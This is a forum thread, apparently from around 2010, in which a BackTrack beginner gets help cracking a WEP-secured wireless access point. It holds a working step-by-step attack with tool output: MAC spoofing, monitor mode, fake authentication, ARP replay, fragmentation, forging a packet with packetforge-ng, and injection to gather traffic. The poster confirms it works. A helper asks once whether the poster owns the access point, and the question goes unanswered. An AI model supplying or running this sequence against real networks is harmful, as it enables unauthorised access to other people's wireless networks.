Thread: I do not understand what the problem with aireplay-ng

  1. #1
    Just burned his ISO

    Hi.
    I'm a beginner with Backtrack 4.
    Backtrack with VMware.
    USB adapter: TP-LINK TL-WN321G
    So:
    Code:
    airmon-ng stop wlan0
    ifconfig  wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng  start wlan0
    Code:
    airodump-ng  wlan0
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    00:27:19:C1:CB:BE  -76       36       29    0   3  54 . WEP  WEP         TP-LINK_pete
    Code:
    airodump-ng -c 3 -w wep --bssid 00:27:19:C1:CB:BE wlan0
    and #data speed: 5 / sec...
    Code:
    aireplay-ng -1 0 -a 00:27:19:C1:CB:BE -h 00:11:22:33:44:55 wlan0
    
    09:04:34  Waiting for beacon frame (BSSID: 00:27:19:C1:CB:BE) on channel 3
    
    09:04:34  Sending Authentication Request (Open System) [ACK]
    09:04:34  Authentication successful
    09:04:34  Sending Association Request [ACK]
    09:04:34  Got a deauthentication packet! (Waiting 3 seconds)
    
    09:04:37  Sending Authentication Request (Open System) [ACK]
    09:04:37  Authentication successful
    09:04:37  Sending Association Request [ACK]
    09:04:37  Got a deauthentication packet! (Waiting 5 seconds)
    
    09:04:42  Sending Authentication Request (Open System) [ACK]
    09:04:42  Authentication successful
    09:04:42  Sending Association Request [ACK]
    09:04:42  Got a deauthentication packet! (Waiting 7 seconds)
    Code:
    aireplay-ng -9 wlan0
    09:08:45  Trying broadcast probe requests...
    09:08:45  Injection is working!
    09:08:47  Found 1 AP
    
    09:08:47  Trying directed probe requests...
    09:08:47  00:27:19:C1:CB:BE - channel: 3 - 'TP-LINK_pete'
    09:08:47  Ping (min/avg/max): 0.524ms/5.426ms/9.897ms Power: -81.33
    09:08:47  30/30: 100%
    What is the problem?
    Thanks for help.

  2. #2
    Senior Member hypervista

    There are a couple of things for you to check:

    1) When you type the command airmon-ng start wlan0, it should have returned a message telling you that "monitor mode enabled on mon0" or similar. The mon0 (or similar) is the interface you should be using in all subsequent commands, not wlan0.

    2) Once you determine your target, you need to stop airmon-ng and restart it specifying the target channel (i.e. airmon-ng stop wlan0 followed by airmon-ng start wlan0 3). Your interface card should be on the same channel as your target. Check to make sure that monitor mode was enabled once again on mon0 and use that monitor mode interface in your subsequent commands.

    It also appears your target AP is too far away: PWR -76. Move closer. It's also possible that your target has implemented MAC filtering. In that case you need to use a valid client MAC to fake-authenticate with. Are you sure you own the AP you're trying to crack?
    Last edited by hypervista; 05-10-2010 at 01:57 PM.

  3. #3
    Just burned his ISO

    Quote: Originally posted by hypervista
    There are a couple of things for you to check;
    1) when you type the command: airmon-ng start wlan0 it should have returned a message telling you that "monitor mode enabled on mon0" or similar. The mon0 (or similar) is the interface you should be using in all subsequent commands, not wlan0.
    Code:
    13:06:07  Sending Authentication Request (Open System) [ACK]
    13:06:07  Authentication successful
    13:06:07  Sending Association Request [ACK]
    13:06:07  Association successful :-) (AID: 1)
    Thank you.

    But a new problem:

    Code:
    aireplay-ng -1 0 -a 00:27:19:C1:CB:BE -h 00:11:22:33:44:55 mon0
    aireplay-ng -3 -b 00:27:19:C1:CB:BE -h 00:11:22:33:44:55 mon0
    
    You should also start airodump-ng to capture replies.
    ^Cad 9950 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
    And #Data Speed: 8/sec

    Elapsed: 1 hour 30 mins
    PWR: -70
    Beacons 77600
    #Data: 40800

    I do not know why it is so slow.

  4. #4
    Senior Member hypervista

    Well, you can try fragmentation, which will require a few more steps. After you successfully fake-authenticate, try this:

    Code:
    aireplay-ng -5 -b <target AP bssid> -h <iface (mon0) MAC> mon0
    Once a packet is captured it will ask "use this packet" - type Y for yes

    The resultant key stream will be captured and saved in a file with a .xor extension

    Then type:

    Code:
    packetforge-ng -0 -a <target AP bssid> -h <iface (mon0) MAC> -k 255.255.255.255 -l 255.255.255.255 -y <filename.xor (from previous step)> -w <anyfilename>
    Then inject your forged packet and watch the data packets increase:

    Code:
    aireplay-ng -2 -r <the anyfilename file you created in the previous step> mon0

  5. #5
    Just burned his ISO

    Thanks for the help. It all works.

  6. #6
    Just burned his ISO

    delete.....
    Last edited by DaT630Da; 05-19-2010 at 06:02 PM.
